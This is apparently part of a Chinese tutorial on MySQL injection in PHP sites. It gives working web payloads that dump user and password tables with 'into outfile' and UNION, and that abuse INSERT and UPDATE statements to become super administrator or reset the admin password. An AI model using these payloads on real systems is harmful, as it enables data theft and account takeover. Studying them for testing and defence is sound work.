三、导出文件

这个是比较容易构造但又有一定限制的技术，我们经常可以看见以下的SQL语句：

select * from table into outfile 'c:/file.txt'
select * from table into outfile '/var/www/file.txt'

但这样
的语句，一般很少用在程序里，有谁会把自己的数据导出呢？除非是备份，但我也没有见过这种备份法。所以我们要自己构造，但必须有下面的前提条件：

l 必须导出到能访问的目录，这样才能下载。
l 能访问的目录必须要有可写的权限，否则导出会失败。
l 确保硬盘有足够的容量能容下导出的数据，这个很少见。
l 确保要已经存在相同的文件名，会导致导出失败，并提示："File 'c:/file.txt' already exists"，这样可以防止数据库表和文件例如/etc/passwd被破坏。

我们继续用上面的user.php和show.php两个文件举例，如果一个一个用户猜解实在是太慢了，如果对方的密码或者其他敏感信息很复杂，又不会写Exploit，要猜到什么时候啊？来点大范围的，直接导出全部数据好了。user.php文件的查询语句，我们按照into outfile的标准格式，注入成下面的语句就能导出我们需要的信息了：

SELECT * FROM user WHERE username='$username' into outfile 'c:/file.txt'

知道怎么样的语句可以实现我们的目的，我们就很容易构造出相应的语句：

http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

出现了错误提示，但从返回的语句看来，我们的SQL语句确实是注入正确了，即使出现错误，也是查询的问题了，文件还是乖乖的被导出了，如图：

由于代码本身就有WHERE来指定一个条件，所以我们导出的数据仅仅是满足这个条件的数据，如果我们想导出全部呢？其实很简单，只要使这个WHERE条件为假，并且指定一个成真的条件，就可以不用被束缚在WHERE里了，来看看经典1=1发挥作用了：

http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

实际的SQL语句变为：

SELECT * FROM user WHERE username='' or 1=1 into outfile 'c:/file.txt'

这样username的参数是空的，就是假了，1=1永远是真的，那or前面的WHERE就不起作用了，但千万别用and哦，否则是不能导出全部数据的。
既然条件满足，在这种情况下就直接导出所有数据！如图：

但是跨表的导出文件的语句该怎么构造呢？还是用到UNION联合查询，所以一切前提条件都应该和UNION、导出数据一样，跨表导出数据正常情况下应该相下面的一样：

SELECT * FROM article WHERE articleid='1' union select 1,username,password from user into outfile 'c:/user.txt'

这样可以导出文件了，如果我们要构造就提交：

http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user into outfile 'c:/user.txt

文件是出来了，可是有一个问题，由于前面的查询articleid='1'为真了，所以导出的数据也有整个文章的一部分，所以我们把应该使前面的查询语句为假，才能只导出后面查询的内容，只要提交：

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

这样才能得到我们想要的资料：

值得注意的是想要导出文件，必须magic_quotes_gpc没有打开，并且程序也没有用到addslashes()函数，还有不能对单引号做任何过滤，因为我们在提交导出路径的时候，一定要用引号包含起来，否则，系统不会认识那是一个路径，也不用尝试用char()或者什么函数，那是徒劳。

INSERT

如果大家认为MYSQL中注入仅仅适用于SELECT就大错特错了，其实还有两个危害更大的操作，那就是INSERT和UPDATE语句，这类例子不多，先面先说说INSERT，这主要应用于改写插入的数据，我们来看个简单而又广泛存在的例子，看看下面的数据结构：

CREATE TABLE `user` (
`userid` INT NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 20 ) NOT NULL ,
`password` VARCHAR( 50 ) NOT NULL ,
`homepage` VARCHAR( 255 ) NOT NULL ,
`userlevel` INT DEFAULT '1' NOT NULL ,

PRIMARY KEY ( `userid` )
);

其中的userlevel代表用户的等级，1是普通用户，2是普通管理员，3是超级管理员，一个注册程序默认是注册成普通用户，如下：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

默认userlevel字段是插入1，其中的变量都是没有经过过滤就直接写入数据库的，不知道大家有什么想法？对，就是直接注入，使我们一注册就是超级管理员。我们注册的时候，构造$homepage变量，就可以达到改写的目的，指定$homepage变量为：

http://4ngel.net', '3')#

插入数据库的时候就变成：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

这样就注册成为超级管理员了。但这种利用方法也有一定的局限性，比如，我没有需要改写的变量如userlevel字段是数据库的第一个字段，前面没有地方给我们注入，我们也没有办法了。
或许INSERT还有更广泛的应用，大家可以自行研究，但原理都是一样的。

UPDATE

和INSERT相比，UPDATE的应用更加广泛，如果过滤不够，足以改写任何数据，还是拿刚才的注册程序来说，数据结构也不变，我们看一下用户自己修改自己的资料，SQL语句一般都是这样写的：

UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'

用户可以修改自己的密码和主页，大家有什么想法？总不至于还是提升权限吧？程序中的SQL语句又没有更新userlevel字段，怎么提升啊？还是老办法，构造$homepage变量, 指定$homepage变量为：

http://4ngel.net', userlevel='3

整个SQL语句就变成这样：

UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'

我们是不是又变成超级管理员了？程序不更新userlevel字段，我们自己来。
还有更加绝的，直接修改任意用户的资料，还是刚才的例句，但这次安全一点，使用MD5加密：

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

尽管密码被加密了，但我们还是可以构造我们需要的语句，我们指定$password为：

mypass)' WHERE username='admin'#

这时整个语句变为：

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

这样就更改了更新的条件，我管你后面的代码是不是在哭这说：我们还没有执行啊。当然，也可以从$id下手，指定$id为：

' OR username='admin'

这时整个语句变为：

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

照样也可以达到修改的目的，所以说注入是非常灵活的技术。如果有些变量是从数据库读取的固定值，甚至用$_SESSION['username']来读取服务器上的SESSION信息时，我们就可以在原来的WHERE之前自己构造WHERE并注释掉后面的代码，由此可见，灵活运用注释也是注入的技巧之一。这些技巧把注入发挥得淋漓尽致。不得不说是一种艺术。
变量的提交方式可以是GET或POST，提交的位置可以是地址栏、表单、隐藏表单变量或修改本地COOKIE信息等，提交的方式可以是本地提交，服务器上提交或者是工具提交，多种多样就看你如何运用了。

上一页  [1] [2] [3] [4] [5] 下一页